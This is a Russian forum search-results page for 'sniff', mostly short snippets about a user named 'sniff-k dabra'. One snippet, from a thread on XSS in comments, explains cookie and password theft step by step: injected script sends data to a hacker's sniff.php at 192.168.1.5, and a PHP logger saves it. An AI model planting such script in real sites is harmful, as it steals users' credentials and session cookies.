Слово
«sniff»впервые сказано пользователем
~Ironia~ 17.07.2008 в 22:11,
и с тех пор употреблялось
10 раз.
Сообщения со словом
«sniff»
Запрос выполнился за
0.1464 сек.
- 03.06.2010, 14:31. АКудияр в теме
«Пространство без бесконечности»
sniff-k dabra я тут давидюка только помню добродюк...
- 15.08.2008, 12:09. Lexxus в теме
«Путеводитель по МИФИческому спорту»
самбо про форму sniff-k dabra 7 сентября 2007 года minstrel 7 сентября...
- 17.07.2008, 22:11. ~Ironia~ в теме
«XSS - атаки в комметариях»
... javascript-код script document location href http 192 168 1 5 sniff php test script этот код переадресует нас на web-страницу http 192 168 1 5 sniff php а в качестве параметра для примера передается слово test сценарий sniff php это программа хакера которая просто сохраняет переданный url в каком-нибудь хранилище например в текстовом файле пример такого файла может быть следующим php f fopen snif txt а fwrite f requbst ori fclose f print ok в этом примере содержимое url сохраняется в текстовом файле snif txt в нашем случае в этот файл попадет следующая строка sniff php test пока вроде ничего страшного хакер сам себе отправил сообщение test и web-сайт пока не пострадал усложняем задачу допустим что в форме отправки сообщения есть невидимое поле passws через которое передается пароль input type hidden name passws value qwerty каждый пользователь видит свой пароль а чтобы увидеть чужой необходимо его перехватить для этого хакер может внедрить на форму следующий javascript-код script document location href- httpi 192 168 1 5 sniff php document message passw value script в этом примере файлу sniff php передается содержимое невидимого поля теперь в файле snif txt хакер будет собирать пароли добропорядочных пользователей и возможно что на удочку попадется и администратор но вероятность найти подобный сценарий стремится к нулю намного чаще пароли хранятся в cookies но и их украсть не проблема достаточно только внедрить на форму следующий код script document location href http 192 168 1 5 sniff php document cookie script благодаря тому что javascript имеет доступ к cookies мы без проблем можем отправить их своему сценарию допустим что в самом начале нашего сценария в cookies устанавливаются следующие два значения php setcookie user admin time 5184000 setcookie pass qwerty time 5184000 теперь после их перехвата в файле snif txt мы увидим следующее sniff php user admin 20pass qwerty вот так вот хакеры с помощью xss воруют пароли единственный недостаток всех примеров которые описаны выше они перенаправляют пользователя на web-страницу хакера это не очень хорошо потому что пользователь может заподозрить что-то неладное но хакеры нашли более незаметный способ script img new image img src http 192 168 1 5 sniff php document cookie script секрет прост мы просто создаем изображение и присваиваем ему в качестве адреса наш сценарий да это неправильно ведь сценарий не является изображением но этот метод работает при желании даже можно переименовать файл sniff php в sniff gif от этого ничего не изменится теперь у хакера...
- 17.04.2008, 18:06. Константин Давидюк в теме
«Лжеучёные в МИФИ»
... малоупотребительных слов и все падут ниц здесь есть такой парень sniff-k dabra если вы правы то попробуйте пройти его...
- 26.02.2008, 17:12. Константин Давидюк в теме
«Ложный континуум в математике»
интересно а кде sniff-k dabra
- 13.02.2008, 21:13. Константин Давидюк в теме
«Ложный континуум в математике»
sniff-k dabra я проделал за вас всю работу мнения академиков...
- 12.02.2008, 20:07. SharapoFF в теме
«Если вы держите руки в карманах»
... отношение перед семьёй ответить придется хошь покажу sniff-k dabra ошибочка вышла ну типа да а то ты этого...
- 11.02.2008, 12:41. Kamille в теме
«Загадка от Льва Толстого»
sniff-k dabra значит он решил что проще дть денег чтобы...
- 11.02.2008, 12:05. Kamille в теме
«Загадка от Льва Толстого»
sniff-k dabra а тебя никогда не отсылали в соседний...
- 08.02.2008, 21:05. S1680 в теме
«школьный портал»
sniff-k dabra эти имена для мальчиков и девочек больше...
